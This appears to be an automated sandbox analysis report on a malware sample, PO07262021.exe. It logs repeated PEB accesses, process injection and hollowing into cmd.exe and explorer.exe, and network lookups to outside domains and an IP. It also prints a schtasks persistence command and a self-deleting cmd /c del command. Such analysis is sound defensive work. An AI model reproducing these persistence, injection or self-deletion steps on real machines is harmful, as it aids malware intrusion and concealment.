          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B30EA5 mov eax, dword ptr fs:[00000030h]15_2_03B30EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B30EA5 mov eax, dword ptr fs:[00000030h]15_2_03B30EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B30EA5 mov eax, dword ptr fs:[00000030h]15_2_03B30EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7AAB0 mov eax, dword ptr fs:[00000030h]15_2_03A7AAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7AAB0 mov eax, dword ptr fs:[00000030h]15_2_03A7AAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9FAB0 mov eax, dword ptr fs:[00000030h]15_2_03A9FAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFFE87 mov eax, dword ptr fs:[00000030h]15_2_03AFFE87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9D294 mov eax, dword ptr fs:[00000030h]15_2_03A9D294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9D294 mov eax, dword ptr fs:[00000030h]15_2_03A9D294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A776E2 mov eax, dword ptr fs:[00000030h]15_2_03A776E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A916E0 mov ecx, dword ptr fs:[00000030h]15_2_03A916E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92AE4 mov eax, dword ptr fs:[00000030h]15_2_03A92AE4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92ACB mov eax, dword ptr fs:[00000030h]15_2_03A92ACB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38ED6 mov eax, dword ptr fs:[00000030h]15_2_03B38ED6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A936CC mov eax, dword ptr fs:[00000030h]15_2_03A936CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA8EC7 mov eax, dword ptr fs:[00000030h]15_2_03AA8EC7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1FEC0 mov eax, dword ptr fs:[00000030h]15_2_03B1FEC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6E620 mov eax, dword ptr fs:[00000030h]15_2_03A6E620
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA4A2C mov eax, dword ptr fs:[00000030h]15_2_03AA4A2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA4A2C mov eax, dword ptr fs:[00000030h]15_2_03AA4A2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1FE3F mov eax, dword ptr fs:[00000030h]15_2_03B1FE3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6C600 mov eax, dword ptr fs:[00000030h]15_2_03A6C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6C600 mov eax, dword ptr fs:[00000030h]15_2_03A6C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6C600 mov eax, dword ptr fs:[00000030h]15_2_03A6C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A98E00 mov eax, dword ptr fs:[00000030h]15_2_03A98E00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A78A0A mov eax, dword ptr fs:[00000030h]15_2_03A78A0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6AA16 mov eax, dword ptr fs:[00000030h]15_2_03A6AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6AA16 mov eax, dword ptr fs:[00000030h]15_2_03A6AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A83A1C mov eax, dword ptr fs:[00000030h]15_2_03A83A1C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9A61C mov eax, dword ptr fs:[00000030h]15_2_03A9A61C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9A61C mov eax, dword ptr fs:[00000030h]15_2_03A9A61C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A65210 mov eax, dword ptr fs:[00000030h]15_2_03A65210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A65210 mov ecx, dword ptr fs:[00000030h]15_2_03A65210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A65210 mov eax, dword ptr fs:[00000030h]15_2_03A65210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A65210 mov eax, dword ptr fs:[00000030h]15_2_03A65210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7766D mov eax, dword ptr fs:[00000030h]15_2_03A7766D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA927A mov eax, dword ptr fs:[00000030h]15_2_03AA927A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1B260 mov eax, dword ptr fs:[00000030h]15_2_03B1B260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1B260 mov eax, dword ptr fs:[00000030h]15_2_03B1B260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38A62 mov eax, dword ptr fs:[00000030h]15_2_03B38A62
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8AE73 mov eax, dword ptr fs:[00000030h]15_2_03A8AE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8AE73 mov eax, dword ptr fs:[00000030h]15_2_03A8AE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8AE73 mov eax, dword ptr fs:[00000030h]15_2_03A8AE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8AE73 mov eax, dword ptr fs:[00000030h]15_2_03A8AE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8AE73 mov eax, dword ptr fs:[00000030h]15_2_03A8AE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69240 mov eax, dword ptr fs:[00000030h]15_2_03A69240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69240 mov eax, dword ptr fs:[00000030h]15_2_03A69240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69240 mov eax, dword ptr fs:[00000030h]15_2_03A69240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69240 mov eax, dword ptr fs:[00000030h]15_2_03A69240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A77E41 mov eax, dword ptr fs:[00000030h]15_2_03A77E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF4257 mov eax, dword ptr fs:[00000030h]15_2_03AF4257
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A935A1 mov eax, dword ptr fs:[00000030h]15_2_03A935A1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE69A6 mov eax, dword ptr fs:[00000030h]15_2_03AE69A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A961A0 mov eax, dword ptr fs:[00000030h]15_2_03A961A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A961A0 mov eax, dword ptr fs:[00000030h]15_2_03A961A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE51BE mov eax, dword ptr fs:[00000030h]15_2_03AE51BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE51BE mov eax, dword ptr fs:[00000030h]15_2_03AE51BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE51BE mov eax, dword ptr fs:[00000030h]15_2_03AE51BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE51BE mov eax, dword ptr fs:[00000030h]15_2_03AE51BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A91DB5 mov eax, dword ptr fs:[00000030h]15_2_03A91DB5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A91DB5 mov eax, dword ptr fs:[00000030h]15_2_03A91DB5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A91DB5 mov eax, dword ptr fs:[00000030h]15_2_03A91DB5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92581 mov eax, dword ptr fs:[00000030h]15_2_03A92581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92581 mov eax, dword ptr fs:[00000030h]15_2_03A92581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92581 mov eax, dword ptr fs:[00000030h]15_2_03A92581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92581 mov eax, dword ptr fs:[00000030h]15_2_03A92581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8C182 mov eax, dword ptr fs:[00000030h]15_2_03A8C182
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9A185 mov eax, dword ptr fs:[00000030h]15_2_03A9A185
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A62D8A mov eax, dword ptr fs:[00000030h]15_2_03A62D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A62D8A mov eax, dword ptr fs:[00000030h]15_2_03A62D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A62D8A mov eax, dword ptr fs:[00000030h]15_2_03A62D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A62D8A mov eax, dword ptr fs:[00000030h]15_2_03A62D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A62D8A mov eax, dword ptr fs:[00000030h]15_2_03A62D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9FD9B mov eax, dword ptr fs:[00000030h]15_2_03A9FD9B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9FD9B mov eax, dword ptr fs:[00000030h]15_2_03A9FD9B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92990 mov eax, dword ptr fs:[00000030h]15_2_03A92990
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B18DF1 mov eax, dword ptr fs:[00000030h]15_2_03B18DF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6B1E1 mov eax, dword ptr fs:[00000030h]15_2_03A6B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6B1E1 mov eax, dword ptr fs:[00000030h]15_2_03A6B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6B1E1 mov eax, dword ptr fs:[00000030h]15_2_03A6B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF41E8 mov eax, dword ptr fs:[00000030h]15_2_03AF41E8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7D5E0 mov eax, dword ptr fs:[00000030h]15_2_03A7D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7D5E0 mov eax, dword ptr fs:[00000030h]15_2_03A7D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov eax, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov eax, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov eax, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov ecx, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov eax, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6DC9 mov eax, dword ptr fs:[00000030h]15_2_03AE6DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38D34 mov eax, dword ptr fs:[00000030h]15_2_03B38D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A84120 mov eax, dword ptr fs:[00000030h]15_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A84120 mov eax, dword ptr fs:[00000030h]15_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A84120 mov eax, dword ptr fs:[00000030h]15_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A84120 mov eax, dword ptr fs:[00000030h]15_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A84120 mov ecx, dword ptr fs:[00000030h]15_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94D3B mov eax, dword ptr fs:[00000030h]15_2_03A94D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94D3B mov eax, dword ptr fs:[00000030h]15_2_03A94D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94D3B mov eax, dword ptr fs:[00000030h]15_2_03A94D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9513A mov eax, dword ptr fs:[00000030h]15_2_03A9513A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9513A mov eax, dword ptr fs:[00000030h]15_2_03A9513A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A73D34 mov eax, dword ptr fs:[00000030h]15_2_03A73D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6AD30 mov eax, dword ptr fs:[00000030h]15_2_03A6AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA537 mov eax, dword ptr fs:[00000030h]15_2_03AEA537
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69100 mov eax, dword ptr fs:[00000030h]15_2_03A69100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69100 mov eax, dword ptr fs:[00000030h]15_2_03A69100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69100 mov eax, dword ptr fs:[00000030h]15_2_03A69100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6C962 mov eax, dword ptr fs:[00000030h]15_2_03A6C962
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6B171 mov eax, dword ptr fs:[00000030h]15_2_03A6B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6B171 mov eax, dword ptr fs:[00000030h]15_2_03A6B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8C577 mov eax, dword ptr fs:[00000030h]15_2_03A8C577
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8C577 mov eax, dword ptr fs:[00000030h]15_2_03A8C577
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA3D43 mov eax, dword ptr fs:[00000030h]15_2_03AA3D43
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8B944 mov eax, dword ptr fs:[00000030h]15_2_03A8B944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8B944 mov eax, dword ptr fs:[00000030h]15_2_03A8B944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3540 mov eax, dword ptr fs:[00000030h]15_2_03AE3540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A87D50 mov eax, dword ptr fs:[00000030h]15_2_03A87D50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA90AF mov eax, dword ptr fs:[00000030h]15_2_03AA90AF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A0 mov eax, dword ptr fs:[00000030h]15_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9F0BF mov ecx, dword ptr fs:[00000030h]15_2_03A9F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9F0BF mov eax, dword ptr fs:[00000030h]15_2_03A9F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9F0BF mov eax, dword ptr fs:[00000030h]15_2_03A9F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A69080 mov eax, dword ptr fs:[00000030h]15_2_03A69080
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3884 mov eax, dword ptr fs:[00000030h]15_2_03AE3884
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3884 mov eax, dword ptr fs:[00000030h]15_2_03AE3884
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7849B mov eax, dword ptr fs:[00000030h]15_2_03A7849B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B214FB mov eax, dword ptr fs:[00000030h]15_2_03B214FB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A658EC mov eax, dword ptr fs:[00000030h]15_2_03A658EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6CF0 mov eax, dword ptr fs:[00000030h]15_2_03AE6CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6CF0 mov eax, dword ptr fs:[00000030h]15_2_03AE6CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6CF0 mov eax, dword ptr fs:[00000030h]15_2_03AE6CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38CD6 mov eax, dword ptr fs:[00000030h]15_2_03B38CD6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov ecx, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB8D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9002D mov eax, dword ptr fs:[00000030h]15_2_03A9002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9002D mov eax, dword ptr fs:[00000030h]15_2_03A9002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9002D mov eax, dword ptr fs:[00000030h]15_2_03A9002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9002D mov eax, dword ptr fs:[00000030h]15_2_03A9002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9002D mov eax, dword ptr fs:[00000030h]15_2_03A9002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9BC2C mov eax, dword ptr fs:[00000030h]15_2_03A9BC2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7B02A mov eax, dword ptr fs:[00000030h]15_2_03A7B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7B02A mov eax, dword ptr fs:[00000030h]15_2_03A7B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7B02A mov eax, dword ptr fs:[00000030h]15_2_03A7B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7B02A mov eax, dword ptr fs:[00000030h]15_2_03A7B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6C0A mov eax, dword ptr fs:[00000030h]15_2_03AE6C0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6C0A mov eax, dword ptr fs:[00000030h]15_2_03AE6C0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6C0A mov eax, dword ptr fs:[00000030h]15_2_03AE6C0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6C0A mov eax, dword ptr fs:[00000030h]15_2_03AE6C0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F1914 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,15_2_011F1914
          Source: C:\Users\user\Desktop\PO07262021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E7310 SetUnhandledExceptionFilter,15_2_011E7310
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_011E6FE3
          Source: C:\Users\user\Desktop\PO07262021.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.winabeel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ppneumatic.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO07262021.exeMemory written: C:\Users\user\Desktop\PO07262021.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO07262021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO07262021.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO07262021.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO07262021.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Users\user\Desktop\PO07262021.exe C:\Users\user\Desktop\PO07262021.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO07262021.exe'Jump to behavior
          Source: explorer.exe, 00000009.00000000.732433250.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.722788045.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,15_2_011E3F80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,15_2_011D96A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,15_2_011D5AEF
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Users\user\Desktop\PO07262021.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
